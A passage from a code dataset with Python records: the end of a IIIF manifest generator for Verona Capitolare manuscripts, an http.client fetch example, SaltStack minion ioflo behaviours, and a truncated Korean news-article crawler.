%(record[\"numero_del_codice\"],record[\"numerazione_araba\"])\nmanifest.add_label(\"it\",\"Manoscritto: %s\" %segn)\n\nmanifest.add_metadata(label=\"rilegatura_moderna\",value=record[\"rilegatura_moderna\"],language_l=\"it\")\nmanifest.add_metadata(label=\"Collocazione:\",value=record[\"Collocazione\"],language_l=\"it\")\nmanifest.add_metadata(label=\"Segnatura espressa come numero arabo:\",value=record[\"roman_converted\"],language_l=\"it\")\nmanifest.add_metadata(label=\"Segnatura:\",value=record[\"numero_del_codice\"],language_l=\"it\")\nmanifest.add_metadata(label=\"Antica 
segnatura con numero arabo:\",value=record[\"numerazione_araba\"],language_l=\"it\")\nmanifest.add_metadata(label=\"Titolo secondo don Spagnolo:\",value=record[\"titolo\"],language_l=\"it\")\nmanifest.add_metadata(label=\"Materiale\",value=record[\"materiale\"],language_l=\"it\")\nmanifest.add_metadata(label=\"Numero di fogli\",value=record[\"fogli\"],language_l=\"it\")\n\nif \"-\" in record[\"Spagnolo\"]:\n pagsp = \"pagine %s\" %record[\"Spagnolo\"]\nelse: \n pagsp = \"pagina %s\" %record[\"Spagnolo\"]\n\nmanifest.add_metadata(label=\"Riferimento al catalogo di don Spagnolo\",value=pagsp,language_l=\"it\")\nif record[\"datazione_f\"] != \"\":\n if int(record[\"datazione_f\"][:-2]) - 1 == int(record[\"datazione_i\"][:-2]):\n datazione = \"al %s secolo\" %romconv[int(record[\"datazione_f\"][:-2])]\n else:\n datazione = \"tra i secoli %s e %s\" %(romconv[int(record[\"datazione_f\"][:-2])],romconv[int(record[\"datazione_f\"][:-2])])\nmanifest.add_metadata(label=\"Databile\",value=datazione,language_l=\"it\",language_v=\"it\")\nmanifest.add_metadata(label=\"lingua\",value=record[\"lingua\"],language_l=\"it\")\nif record[\"altezza\"] != \"\" and record[\"ampiezza\"] != \"\":\n dim = \"%s x %s cm\" %(record[\"altezza\"],record[\"ampiezza\"])\n\nmanifest.add_metadata(label=\"Dimensioni\",value=dim,language_l=\"it\")\nmanifest.add_metadata(label=\"Rilegatura:\",value=record[\"rilegatura\"],language_l=\"it\")\nmanifest.add_metadata(label=\"Tipo di rilegatura\",value=record[\"tipo_rilegatura\"],language_l=\"it\")\nmanifest.add_metadata(label=\"Materiale rilegatura\",value=record[\"materiale_rilegatura\"],language_l=\"it\")\n# more complex entry can be mapped directly to a dictionary and inserted using entry arguments\nmanifest.add_summary(f\"Il manoscritto {segn} è databile {datazione} secondo le informazioni riportate nell catalogo di don Spagnolo ({pagsp}). 
\",language=\"it\")\nmanifest.set_viewingDirection(\"left-to-right\")\nmanifest.add_behavior(\"paged\")\nmanifest.set_navDate(f\"{record['datazione_i']}-01-01T00:00:00Z\")\nmanifest.set_rights(\"http://creativecommons.org/licenses/by/4.0/\")\nmanifest.add_requiredStatement(label=\"Attribution\",value=\"Provided by University of Verona and Biblioteca Capitolare di Verona\",language_l=\"en\",language_v=\"en\")\nprov = manifest.add_provider()\nprov.add_label(\"it\",\"Università di Verona\")\nprov.set_id(\"https://www.univr.it/it/\")\nhomp = prov.add_homepage()\nhomp.set_id(\"https://sites.hss.univr.it/laboratori_integrati/laboratorio-lamedan/\")\nhomp.set_type(\"Text\")\nhomp.add_label(\"en\",\"Laboratorio integrati - LAboratorio di Studi MEdievale e DANteschi\")\nhomp.set_format(\"text/html\")\nlogo = prov.add_logo()\nlogo.set_id(\"https://cdn.univr.it/o/aol-theme/images/logo-univr-colori-80.png\")\nlogo.set_type(\"Image\")\nlogo.set_format(\"image/png\")\n\n\nimages = sorted([image for image in glob.glob(folder+\"/*.jp2\")])\npiatti_e_carte_di_guardia_ant = 4\nfogli = 259\npiatti_e_carte_di_guardia_post = 4\nplabels = ['dorso','piatto anteriore','risguardia anteriore',]\nsidesg1 = cycle(('recto','verso'))\nfor i in range(1,piatti_e_carte_di_guardia_ant+1):\n plabels.append(\"guardia anteriore %i %s\" %(i,next(sidesg1)))\n plabels.append(\"guardia anteriore %i %s\" %(i,next(sidesg1)))\n\nsidesf = cycle(('r','v'))\nfor i in range(1,fogli+1):\n plabels.append(\"%i%s\" %(i,next(sidesf)))\n plabels.append(\"%i%s\" %(i,next(sidesf)))\n\nsidesg2 = cycle(('r','v'))\nfor i in range(1,piatti_e_carte_di_guardia_post+1):\n plabels.append(\"guardia posteriore %i %s\" %(i,next(sidesg2)))\n plabels.append(\"guardia posteriore %i %s\" %(i,next(sidesg2)))\n\npost_elements = ['risguardia posteriore', 'piatto posteriore']\nfor i in post_elements:\n plabels.append(i)\n \nfor idx,d in enumerate(images):\n manloc = \"/manifests/%s\" %segnatura\n image = d\n canvas = manifest.add_canvas_to_items()\n if plabels[idx] in ['dorso','piatto anteriore']:\n canvas.add_behavior(\"paged\")\n canvas.set_id(extendbase_url=[\"manifests\",segnatura,\"canvas\",\"p%s\"%(idx+1)]) # in this case we use the base url\n out = check_output([\"exiftool\", image])\n Metadata = dict((e[:32].strip(),e[33:].strip()) for e in out.decode('utf8').split('\\n'))\n width = Metadata['Image Width']\n height = Metadata['Image Height']\n canvas.set_height(width)\n canvas.set_width(height)\n canvas.add_label(\"it\",plabels[idx])\n annopage = canvas.add_annotationpage_to_items()\n annopage.set_id(extendbase_url=[\"manifests\",segnatura,\"page\",\"p%s\"%(idx+1),\"1\"])\n annotation = annopage.add_annotation_to_items(target=canvas.id)\n annotation.set_id(extendbase_url=[\"manifests\",segnatura,\"annotation\",\"p%s-image\"%str(idx+1).zfill(4)])\n annotation.set_motivation(\"painting\")\n annotation.body.set_id(extendbase_url=[image,\"/full/max/0/default.jpg\"])\n annotation.body.set_type(\"Image\")\n annotation.body.set_format(\"image/jp2\")\n annotation.body.set_width(width)\n annotation.body.set_height(height)\n s = annotation.body.add_service()\n s.set_id(extendbase_url=[image])\n s.set_type(\"ImageService2\")\n s.set_profile(\"level2\")\n \n \nrng = manifest.add_range_to_structures()\nrng.set_id(extendbase_url=\"range/r0\")\nrng.add_label(\"en\",\"Table of Contents\")\nrng2 = 
iiifpapi3.Range()\nrng2.set_id(extendbase_url=\"range/r1\")\nrng2.add_label(\"en\",\"Introduction\")\nrng2.set_supplementary(\"https://example.org/iiif/book1/annocoll/introTexts\")\nrng2.add_canvas_to_items(\"https://example.org/iiif/book1/canvas/p1\")\nsr = iiifpapi3.SpecificResource()\nsr.set_source(\"https://example.org/iiif/book1/canvas/p2\")\nfs = iiifpapi3.FragmentSelector()\nfs.set_xywh(0,0,750,300)\nsr.set_selector(fs)\nrng2.add_item(sr)\nrng.add_item(rng2)\nannopage3 = iiifpapi3.AnnotationPage()\nannopage3.set_id(\"https://example.org/iiif/book1/page/manifest/1\")\nanno = iiifpapi3.Annotation(manifest.id)\nanno.set_id(\"https://example.org/iiif/book1/page/manifest/a1\")\nanno.set_motivation(\"commenting\")\nanno.body.set_language(\"en\")\nanno.body.set_value(\"I love this manifest!\")\nannopage3.add_item(anno)\nmanifest.add_annotation(annopage3)\n\nmanifest.json_save(os.path.join(\"presentationapi\",\"manifests\",\"%s.json\" %segnatura))","sub_path":"examples/Example_Capitolare_server.py","file_name":"Example_Capitolare_server.py","file_ext":"py","file_size_in_byte":7642,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"201738479","text":"\"\"\"\nFetch a file from an HTTP server over a socket using http.client. The filename argument\nmay be a full path on the server, or it may end in a ? query string that targets a CGI\nscript and triggers a remote program. The fetched file data (or the remote program's\noutput) can be saved to a local file to mimic FTP, or parsed with str.find or the\nhtml.parser module. The data returned is a bytes string.\n\"\"\"\n\nimport sys, http.client\nshowlines = 6\n\ntry:\n servername, filename = sys.argv[1:] # command-line arguments\nexcept:\n servername, filename = \"learning-python.com\", '/index.html' # otherwise fall back to a default page\n\nprint(servername, filename)\nserver = http.client.HTTPConnection(servername) # connect to the HTTP server\nserver.putrequest(\"GET\", filename) # send the request line and headers\nserver.putheader(\"Accept\", \"text/html\") # a POST request would also work\nserver.endheaders() # a CGI script filename is fine too\nreply = server.getresponse() # read the reply headers and data\nif reply.status != 200: # 200 means success; anything else is a failure\n print(\"Error sending request\", reply.status, reply.reason)\nelse:\n data = reply.readlines() # file-like access to the received data\n reply.close()\n for line in data[:showlines]: # show the first showlines lines of data\n print(line)","sub_path":"C13_http_getfile.py","file_name":"C13_http_getfile.py","file_ext":"py","file_size_in_byte":1291,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"402155920","text":"# -*- coding: utf-8 -*-\n'''\nThe behaviors to run the salt minion via ioflo\n'''\n\n# Import python libs\nimport os\nimport logging\nimport sys\nimport types\nimport traceback\nimport multiprocessing\nfrom collections import deque\n\n# Import salt libs\nimport salt.minion\nimport salt.payload\nimport salt.utils\nimport salt.utils.event\nimport salt.daemons.masterapi\nimport salt.utils.schedule\nfrom salt.exceptions import (\n CommandExecutionError, CommandNotFoundError, SaltInvocationError)\nfrom salt.transport.road.raet import yarding\nfrom salt.transport.road.raet import stacking\n\n# Import ioflo libs\nimport ioflo.base.deeding\n\n# Import Third Party Libs\nHAS_PSUTIL = False\ntry:\n import psutil\n HAS_PSUTIL = True\nexcept ImportError:\n pass\n\nHAS_RESOURCE = False\ntry:\n import resource\n HAS_RESOURCE = True\nexcept ImportError:\n pass\nlog = logging.getLogger(__name__)\n\n\nclass RouterMinion(ioflo.base.deeding.Deed): # pylint: disable=W0232\n '''\n Route packets from raet into minion processing bins\n '''\n Ioinits = {'opts': '.salt.opts',\n 'udp_stack': '.raet.udp.stack.stack',\n 'uxd_stack': '.salt.uxd.stack.stack',\n 
'fun_in': '.salt.net.fun_in',\n }\n\n def postinitio(self):\n '''\n Map opts for convenience\n '''\n self.uxd_stack.value = stacking.StackUxd(\n lanename=self.opts.value['id'],\n yid=0,\n dirpath=self.opts.value['sock_dir'])\n self.fun_in.value = deque()\n\n def action(self):\n '''\n Empty the queues into process management queues\n '''\n # Start on the udp_in:\n # TODO: Route UXD messages\n while self.udp_stack.value.rxMsgs:\n data = self.udp_stack.value.rxMsgs.popleft()\n if data['route']['dst'][2] == 'fun':\n self.fun_in.value.append(data)\n if data['route']['dst'][1] is not None:\n if data['route']['dst'][1] in self.uxd_stack.value.yards:\n self.uxd_stack.value.transmit(data, data['route']['dst'][1])\n self.uxd_stack.value.serviceAll()\n while self.uxd_stack.value.rxMsgs:\n msg = self.uxd_stack.value.rxMsgs.popleft()\n estate = msg['route']['dst'][0]\n if estate is not None:\n if estate != self.opts.value['id']:\n self.udp_stack.value.message(\n msg,\n self.udp_stack.value.eids[estate])\n\n\nclass ModulesLoad(ioflo.base.deeding.Deed): # pylint: disable=W0232\n '''\n Reload the minion modules\n '''\n Ioinits = {'opts_store': '.salt.opts',\n 'grains': '.salt.loader.grains',\n 'modules': '.salt.loader.modules',\n 'returners': '.salt.loader.returners'}\n\n def postinitio(self):\n '''\n Map opts for convenience\n '''\n self.opts = self.opts_store.value\n\n def action(self):\n '''\n Return the functions and the returners loaded up from the loader\n module\n '''\n # if this is a *nix system AND modules_max_memory is set, lets enforce\n # a memory limit on module imports\n # this feature ONLY works on *nix like OSs (resource module doesn't work on windows)\n modules_max_memory = False\n if self.opts.get('modules_max_memory', -1) > 0 and HAS_PSUTIL and HAS_RESOURCE:\n log.debug(\n 'modules_max_memory set, enforcing a maximum of {0}'.format(\n self.opts['modules_max_memory'])\n )\n modules_max_memory = True\n old_mem_limit = resource.getrlimit(resource.RLIMIT_AS)\n rss, vms = psutil.Process(os.getpid()).get_memory_info()\n mem_limit = rss + vms + self.opts['modules_max_memory']\n resource.setrlimit(resource.RLIMIT_AS, (mem_limit, mem_limit))\n elif self.opts.get('modules_max_memory', -1) > 0:\n if not HAS_PSUTIL:\n log.error('Unable to enforce modules_max_memory because psutil is missing')\n if not HAS_RESOURCE:\n log.error('Unable to enforce modules_max_memory because resource is missing')\n\n self.opts['grains'] = salt.loader.grains(self.opts)\n self.grains.value = self.opts['grains']\n self.modules.value = salt.loader.minion_mods(self.opts)\n self.returners.value = salt.loader.returners(self.opts, self.modules.value)\n\n # we're done, reset the limits!\n if modules_max_memory is True:\n resource.setrlimit(resource.RLIMIT_AS, old_mem_limit)\n\n\nclass Schedule(ioflo.base.deeding.Deed): # pylint: disable=W0232\n '''\n Evaluates the scedule\n '''\n Ioinits = {'opts_store': '.salt.opts',\n 'grains': '.salt.grains',\n 'modules': '.salt.loader.modules',\n 'returners': '.salt.loader.returners',\n 'master_ret': '.salt.net.master_out'}\n\n def postinitio(self):\n '''\n Map opts and make the scedule object\n '''\n self.scedule = salt.utils.schedule.Schedule(\n self.opts.value,\n self.modules.value,\n self.returners.value)\n\n def action(self):\n '''\n Eval the schedule\n '''\n self.scedule.eval()\n\n\nclass FunctionNix(ioflo.base.deeding.Deed): # pylint: disable=W0232\n '''\n Execute a function call\n '''\n Ioinits = {'opts_store': '.salt.opts',\n 'grains': '.salt.grains',\n 'modules': 
'.salt.loader.modules',\n 'returners': '.salt.loader.returners',\n 'fun_ack': '.salt.net.fun_ack',\n 'fun_in': '.salt.net.fun_in',\n 'master_ret': '.salt.net.master_out',\n 'uxd_stack': '.salt.uxd.stack.stack',\n 'executors': '.salt.track.executors'}\n\n def postinitio(self):\n '''\n Map opts for convenience\n '''\n self.opts = self.opts_store.value\n self.matcher = salt.minion.Matcher(\n self.opts,\n self.modules.value)\n self.proc_dir = salt.minion.get_proc_dir(self.opts['cachedir'])\n self.serial = salt.payload.Serial(self.opts)\n self.executors.value = {}\n\n def _return_pub(self, ret):\n '''\n Send the return data back via the uxd socket\n '''\n ret_stack = stacking.StackUxd(\n lanename=self.opts['id'],\n yid=ret['jid'],\n dirpath=self.opts['sock_dir'])\n main_yard = yarding.Yard(\n yid=0,\n prefix=self.opts['id'],\n dirpath=self.opts['sock_dir']\n )\n ret_stack.addRemoteYard(main_yard)\n route = {'src': (self.opts['id'], ret_stack.yard.name, 'jid_ret'),\n 'dst': ('master', None, 'return')}\n msg = {'route': route, 'return': ret}\n ret_stack.transmit(msg, 'yard0')\n ret_stack.serviceAll()\n\n def action(self):\n '''\n Pull the queue for functions to execute\n '''\n if not self.fun_in.value:\n return\n exchange = self.fun_in.value.popleft()\n data = exchange.get('pub')\n # convert top raw strings - take this out once raet is using msgpack\n for key, val in data.items():\n if isinstance(val, basestring):\n data[str(key)] = str(val)\n else:\n data[str(key)] = val\n match = getattr(\n self.matcher,\n '{0}_match'.format(\n data.get('tgt_type', 'glob')\n )\n )(data['tgt'])\n if not match:\n return\n if 'user' in data:\n log.info(\n 'User {0[user]} Executing command {0[fun]} with jid '\n '{0[jid]}'.format(data))\n else:\n log.info(\n 'Executing command {0[fun]} with jid {0[jid]}'.format(data)\n )\n log.debug('Command details {0}'.format(data))\n ex_yard = yarding.Yard(\n yid=data['jid'],\n prefix=self.opts['id'],\n dirpath=self.opts['sock_dir'])\n self.uxd_stack.value.addRemoteYard(ex_yard)\n process = multiprocessing.Process(\n target=self.proc_run,\n kwargs={'exchange': exchange}\n )\n process.start() # Don't join this process! 
The process daemonizes\n # itself and init will clean it up\n\n def proc_run(self, exchange):\n '''\n Execute the run in a dedicated process\n '''\n data = exchange['pub']\n fn_ = os.path.join(self.proc_dir, data['jid'])\n self.opts['__ex_id'] = data['jid']\n salt.utils.daemonize_if(self.opts)\n sdata = {'pid': os.getpid()}\n sdata.update(data)\n with salt.utils.fopen(fn_, 'w+') as fp_:\n fp_.write(self.serial.dumps(sdata))\n ret = {'success': False}\n function_name = data['fun']\n if function_name in self.modules.value:\n try:\n func = self.modules.value[data['fun']]\n args, kwargs = salt.minion.parse_args_and_kwargs(func, data['arg'], data)\n sys.modules[func.__module__].__context__['retcode'] = 0\n return_data = func(*args, **kwargs)\n if isinstance(return_data, types.GeneratorType):\n ind = 0\n iret = {}\n for single in return_data:\n if isinstance(single, dict) and isinstance(iret, list):\n iret.update(single)\n else:\n if not iret:\n iret = []\n iret.append(single)\n tag = salt.utils.event.tagify(\n [data['jid'], 'prog', self.opts['id'], str(ind)],\n 'job')\n event_data = {'return': single}\n self._fire_master(event_data, tag) # Need to look into this\n ind += 1\n ret['return'] = iret\n else:\n ret['return'] = return_data\n ret['retcode'] = sys.modules[func.__module__].__context__.get(\n 'retcode',\n 0\n )\n ret['success'] = True\n except CommandNotFoundError as exc:\n msg = 'Command required for {0!r} not found'.format(\n function_name\n )\n log.debug(msg, exc_info=True)\n ret['return'] = '{0}: {1}'.format(msg, exc)\n except CommandExecutionError as exc:\n log.error(\n 'A command in {0!r} had a problem: {1}'.format(\n function_name,\n exc\n ),\n exc_info=log.isEnabledFor(logging.DEBUG)\n )\n ret['return'] = 'ERROR: {0}'.format(exc)\n except SaltInvocationError as exc:\n log.error(\n 'Problem executing {0!r}: {1}'.format(\n function_name,\n exc\n ),\n exc_info=log.isEnabledFor(logging.DEBUG)\n )\n ret['return'] = 'ERROR executing {0!r}: {1}'.format(\n function_name, exc\n )\n except TypeError as exc:\n aspec = salt.utils.get_function_argspec(\n self.modules.value[data['fun']]\n )\n msg = ('TypeError encountered executing {0}: {1}. See '\n 'debug log for more info. 
Possibly a missing '\n 'arguments issue: {2}').format(function_name,\n exc,\n aspec)\n log.warning(msg, exc_info=log.isEnabledFor(logging.DEBUG))\n ret['return'] = msg\n except Exception:\n msg = 'The minion function caused an exception'\n log.warning(msg, exc_info=log.isEnabledFor(logging.DEBUG))\n ret['return'] = '{0}: {1}'.format(msg, traceback.format_exc())\n else:\n ret['return'] = '{0!r} is not available.'.format(function_name)\n\n ret['jid'] = data['jid']\n ret['fun'] = data['fun']\n ret['fun_args'] = data['arg']\n self._return_pub(ret)\n if data['ret']:\n ret['id'] = self.opts['id']\n for returner in set(data['ret'].split(',')):\n try:\n self.returners.value['{0}.returner'.format(\n returner\n )](ret)\n except Exception as exc:\n log.error(\n 'The return failed for job {0} {1}'.format(\n data['jid'],\n exc\n )\n )\n","sub_path":"salt/daemons/flo/minion.py","file_name":"minion.py","file_ext":"py","file_size_in_byte":13192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"186508966","text":"#news contents crawler\n\nimport sqlite3\nimport os\nimport requests\nfrom bs4 import BeautifulSoup\nfrom bs4 import NavigableString\nfrom urllib.parse import urlparse\nfrom urllib.parse import parse_qs\nimport httputil\nimport io\nimport chardet\nimport pprint\n\n\nconn = sqlite3.connect(\"articles.sqlite3\")\n\ncur = conn.cursor()\ncur.execute(\"SELECT * FROM article_title where (is_downloaded = 0 or is_downloaded is null)\")\n\nnext = True\nfor row in cur.fetchall():\n aid = None\n oid = None\n\n news_url = row[1]\n url_qry = None\n if '?' in row[1] :\n url_qry = parse_qs(row[1].split('?')[1])\n else :\n #parse_qs로 파싱이 안되는 경우\n try:\n params_str = str(row[1]).split('?')[1].split(\"&\")\n except IndexError as e:\n params_str = [str(row[1]).split('/')[-1] ]\n\n if not url_qry is None:\n if not url_qry.get('oid') == None:\n oid = url_qry.get('oid')[0]\n aid = url_qry.get('aid')[0]\n\n news_site = None\n dir_postfix = None\n #네이버 뉴스 링크가 아닌 경우\n if aid == None or oid == None :\n o = urlparse(row[1])\n if o.hostname == 'www.gjdream.com' :\n # 광주드림 뉴스\n news_site = \"gjdream\"\n #http://www.gjdream.com/v2/news/view.html?news_type=201&uid=480802\n dir_postfix=\"gjdream_\" + url_qry.get('news_type')[0] + \"_\" + url_qry.get('uid')[0] + \".news\"\n elif o.hostname == 'news1.kr':\n #뉴스1\n news_site = \"news1\"\n # http://news1.kr/articles/?3023732\n dir_postfix = \"news1_\" + params_str[0] + \".news\"\n elif o.hostname == 'view.asiae.co.kr' or o.hostname == 'www.asiae.co.kr' :\n #아시아경제\n news_site = \"asiae\"\n #http://view.asiae.co.kr/news/view.htm?idxno=2017061813385889015\n #http://www.asiae.co.kr/uhtml/read.jsp?idxno=181892&ion=S1N53&ion2=S2N213\n dir_postfix = news_site + \"_\" + url_qry.get('idxno')[0] + \".news\"\n\n elif o.hostname == 'news.heraldcorp.com':\n # 헤럴드경제\n news_site = \"heraldcorp\"\n # http://news.heraldcorp.com/village/view.php?ud=201706141855012313875_12\n dir_postfix = \"heraldcorp_\" + url_qry.get('ud')[0] + \".news\"\n elif o.hostname == 'www.mt.co.kr':\n # 머니투데이\n news_site = \"mt\"\n # http://www.mt.co.kr/view/mtview.php?type=1&no=2017060815500512576&outlink=1\n dir_postfix = news_site + \"_\" + url_qry.get('no')[0] + \".news\"\n\n elif o.hostname == 'www.newsis.com':\n # 뉴시스\n news_site = \"newsis\"\n # http://www.newsis.com/view/?id=NISX20170615_0000013759&cID=10812&pID=10800\n dir_postfix = news_site + \"_\" + url_qry.get('id')[0] + \".news\"\n\n elif o.hostname == 'www.edaily.co.kr':\n # 이데일리\n news_site = \"edaily\"\n 
# http://www.edaily.co.kr/news/newspath.asp?newsid=04391926615962048\n if not url_qry.get('newsid') == None :\n dir_postfix = news_site + \"_\" + url_qry.get('newsid')[0] + \".news\"\n #http://www.edaily.co.kr/news/related_article.edy?uid=1175703&mcd=01\n elif not url_qry.get('uid') == None:\n dir_postfix = news_site + \"_\"+ url_qry.get('uid')[0] +\"_\" + url_qry.get('mcd')[0] + \".news\"\n\n elif o.hostname == 'news.mk.co.kr':\n # 매경\n news_site = \"mk\"\n # http://news.mk.co.kr/newsRead.php?&year=2017&no=357698\n dir_postfix = news_site + \"_\" + url_qry.get('year')[0] + \"_\" + url_qry.get('no')[0] + \".news\"\n\n elif o.hostname == 'www.fnnews.com':\n # 파이낸셜뉴스\n news_site = \"fnnews\"\n # http://www.fnnews.com/news/201705312021291702\n dir_postfix = news_site + \"_\" + params_str[0] + \".news\"\n\n elif o.hostname == 'www.hankyung.com':\n # 한국경제\n news_site = \"hankyung\"\n # http://www.hankyung.com/news/app/newsview.php?aid=2017053129361\n dir_postfix = news_site + \"_\" + url_qry.get('aid')[0] + \".news\"\n\n elif o.hostname == 'www.newspim.com':\n # newspim\n news_site = \"newspim\"\n # http://www.newspim.com/sub_view.php?cate1=3&cate2=6&news_id=100534\n if not url_qry is None and not url_qry.get('cate1') is None :\n dir_postfix = news_site + \"_\" + url_qry.get('cate1')[0] +\"_\" + url_qry.get('cate2')[0] + \"_\" + url_qry.get('news_id')[0] + \".news\"\n news_url = \"http://www.newspim.com/news/view/\" + url_qry.get('news_id')[0]\n elif not url_qry is None:\n dir_postfix = news_site + \"_\" + url_qry.get('newsId')[0] + \".news\"\n news_url = \"http://www.newspim.com/news/view/\" + url_qry.get('newsId')[0]\n else:\n # http://www.newspim.com/news/view/20151211000469 형태이므로 url을 수정하지 않는다.\n dir_postfix = news_site + \"_\" + news_url.split('/')[-1] + \".news\"\n\n\n\n\n\n\n elif o.hostname == 'www.etoday.co.kr':\n # etoday\n news_site = \"etoday\"\n # http://www.etoday.co.kr/news/section/newsview.php?TM=news&SM=0404&idxno=308376\n # http://www.etoday.co.kr/news/section/newsview.php?idxno=637504\n if url_qry.get('TM') is None:\n dir_postfix = news_site + \"_\" + url_qry.get('idxno')[0] + \".news\"\n else:\n dir_postfix = news_site + \"_\" + url_qry.get('TM')[0] +\"_\" + url_qry.get('SM')[0] + \"_\" + url_qry.get('idxno')[0] + \".news\"\n\n\n elif o.hostname == 'app.yonhapnews.co.kr':\n # 연합뉴스\n news_site = \"yonhapnews\"\n # http://app.yonhapnews.co.kr/YNA/Basic/SNS/r.aspx?c=AKR20170606076600002&did=1195m\n dir_postfix = news_site + \"_\" + url_qry.get('c')[0] + \".news\"\n\n elif o.hostname == 'biz.chosun.com':\n # 비즈조선\n news_site = \"biz.chosun\"\n # http://biz.chosun.com/site/data/html_dir/2011/07/14/2011071401906.html\n dir_postfix = news_site + \"_\" + row[1].split('html_dir/')[1][:-5].replace('/','_') + \".news\"\n\n elif o.hostname == 'www.ajunews.com':\n # 아주경제\n news_site = \"ajunews\"\n # http://www.ajunews.com/view/20170618121755955\n if not url_qry is None :\n dir_postfix = news_site + \"_\" + url_qry.get(\"newsId\")[0] + \".news\"\n else:\n dir_postfix = news_site + \"_\" + row[1].split('/')[-1] + \".news\"\n\n elif o.hostname == 'www.thebell.co.kr':\n # 더벨\n news_site = \"thebell\"\n # http://www.thebell.co.kr/front/free/contents/article_view.asp?key=201309060100009530000521\n dir_postfix = news_site + \"_\" + url_qry.get(\"key\")[0] + \".news\"\n\n elif o.hostname == 'www.seoulfn.com':\n # 서울파이낸스\n news_site = \"seoulfn\"\n # http://www.seoulfn.com/news/articleView.html?idxno=39351&ion=section4\n dir_postfix = news_site + \"_\" + url_qry.get(\"idxno\")[0] + \".news\"\n\n 
elif o.hostname == 'www.segye.com':\n # 세계일보\n news_site = \"segye\"\n # http://www.segye.com/Service5/ShellView.asp?TreeID=1052&PCode=0007&DataID=200603011617000176\n dir_postfix = news_site + \"_\" + url_qry.get(\"idxno\")[0] + \".news\"\n\n\n else :\n print(\"Unknown news site. FATAL ERROR ===> %s\" % row[1])\n # 예외는 패스한다.\n continue\n exit(-1)\n else :\n news_site = \"naver\"\n dir_postfix = oid + \"_\" + aid + \".news\"\n\n\n # 파일을 다운로드 합시다!\n print(\"Try downloading %s\" %( dir_postfix ))\n\n # 파일을 다 읽고나서 존재여부를 체크하는것보다 로컬에서 먼저 검색하고나서 체크하는 것이 효율적인듯 하다.\n for root, dirs, files in os.walk(\"articles\"):\n for file in files:\n if str(file) == dir_postfix:\n if os.stat(str(os.path.join(root, file))).st_size > 0 : #파일 사이즈가 0보다 크면\n print(\"File is alread exists : %s \" % str(os.path.join(root, file)))\n print(\"SKIP\")\n qry = \"UPDATE article_title set is_downloaded = 1 where id = %d ;\" % row[0]\n cur.execute(qry)\n conn.commit()\n continue\n\n try:\n res = requests.get(news_url)\n except requests.exceptions.TooManyRedirects as e:\n res = None\n except requests.exceptions.ConnectionError as ce:\n print(\"Connection aborted. : %s\" % news_url)\n continue\n\n\n return_val = 1\n\n if news_site == \"naver\":\n if res.url.startswith('http://sports') : # 스포츠뉴스는 거른다.\n return_val = 2\n else:\n bs = BeautifulSoup(res.text, 'lxml')\n\n if len(bs.select(\"h2.end_tit\")) > 0 :\n # 연예면 기사의 경우 형식이 조금 다르다\n title = bs.select(\"h2.end_tit\")[0].text\n base_dtm = bs.select(\"div#content > div.end_ct > div > div.article_info > span > em\")[0].text.replace('.', '-')\n contents = bs.select(\"div#articeBody\")[0].text\n elif len(bs.select(\"#main_content > div > div > h1.error_title\")) > 0 :\n #news not found\n return_val= 3\n else :\n title = bs.select(\"h3#articleTitle\")[0].text\n base_dtm = bs.select(\"div.sponsor > span.t11\")[0].text\n contents = bs.select(\"div#articleBodyContents\")[0].text\n\n elif news_site == \"gjdream\":\n text = res.text.encode('latin-1').decode('cp949')\n bs = BeautifulSoup(text, 'html.parser')\n title = bs.select(\"table > tr > td > font\")[0].text\n base_dtm = bs.select(\"table > tr > td.f5\")[1].text.split(' : ')[1].strip()\n contents = \"\"\n\n for elmnt in bs.select(\"div#content\")[0].contents:\n if type(elmnt) == NavigableString:\n if str(elmnt).strip() != '':\n contents += str(elmnt).strip() + \"\\n\"\n\n elif news_site == \"news1\":\n bs = BeautifulSoup(res.text, 'html.parser')\n try:\n title = bs.select(\"div.title > h2\")[0].text\n lst_base_dtm = bs.select(\"div.info\")[0].contents[-1].strip().split(' ')[0:2]\n base_dtm = lst_base_dtm[0] + \" \" + lst_base_dtm[1]\n contents = \"\"\n\n for elmnt in bs.select(\"div#articles_detail\")[0].contents:\n if type(elmnt) == NavigableString:\n if str(elmnt).strip() != '':\n contents += str(elmnt).strip() + \"\\n\"\n except IndexError as e :\n if not \"http404\" in bs.select(\"img#img\")[0].attrs[\"src\"]:\n #page not found\n continue\n\n\n elif news_site == 'asiae':\n if res.text.startswith(' h1\")[0].text\n #
 최종수정 2017.06.18 13:39\n #기사입력 2017.06.18 13:39
    \n base_dtm = str(bs.select(\"div.area_title > p\")[0].contents[-1]).strip().replace('.','-')\n contents = bs.select(\"div.article > div\")[0].text\n\n elif news_site == 'heraldcorp':\n text = res.text\n bs = BeautifulSoup(text, 'html.parser')\n title = bs.select(\"div.view_top_t2 > ul > li > h1\")[0].text\n\n raw_base_dtm = bs.select(\"div.view_top_t2 > ul > li.ellipsis\")[0].contents[0]\n if str(raw_base_dtm).startswith('기사입력 ') :\n raw_base_dtm= str(raw_base_dtm)[5:].strip()\n base_dtm = raw_base_dtm\n\n contents = \"\"\n for elmnt in bs.select(\"#articleText\")[0].contents:\n if type(elmnt) == NavigableString:\n if str(elmnt).strip() != '':\n contents += str(elmnt).strip() + \"\\n\"\n\n elif news_site == 'mt':\n text = res.text.encode('latin-1').decode('cp949')\n bs = BeautifulSoup(text, 'html.parser')\n try:\n title = bs.select(\"div#article > h1\")[0].text\n\n base_dtm = bs.select(\"span.num\")[0].text[2:].replace('.','-')\n contents = bs.select(\"div#textBody\")[0].text\n except IndexError as e:\n #다른 페이지로 이동하게 되는 경우이다. 왜이리 번거롭게 만들어놨냐\n #\n next_url = bs.contents[0].text.split('\"')[1]\n res = requests.get(next_url)\n text = res.text.encode('latin-1').decode('cp949')\n bs = BeautifulSoup(text, 'html.parser')\n title = bs.select(\"div#article > h1\")[0].text\n try:\n base_dtm = bs.select(\"span.date\")[0].text.replace('.','-')\n except IndexError as e2:\n base_dtm = bs.select(\"span.num\")[0].text[2:].replace('.','-')\n contents = bs.select(\"div#textBody\")[0].text\n\n\n elif news_site == 'newsis':\n text = res.text\n bs = BeautifulSoup(text, 'html.parser')\n try:\n title = bs.select(\"div.article_tbx > h1\")[0].text\n\n base_dtm = bs.select(\"div.date\")[0].text[3:]\n contents = bs.select(\"div.article_bx > div.view_text > div#textBody\")[0].text\n except IndexError as e :\n if 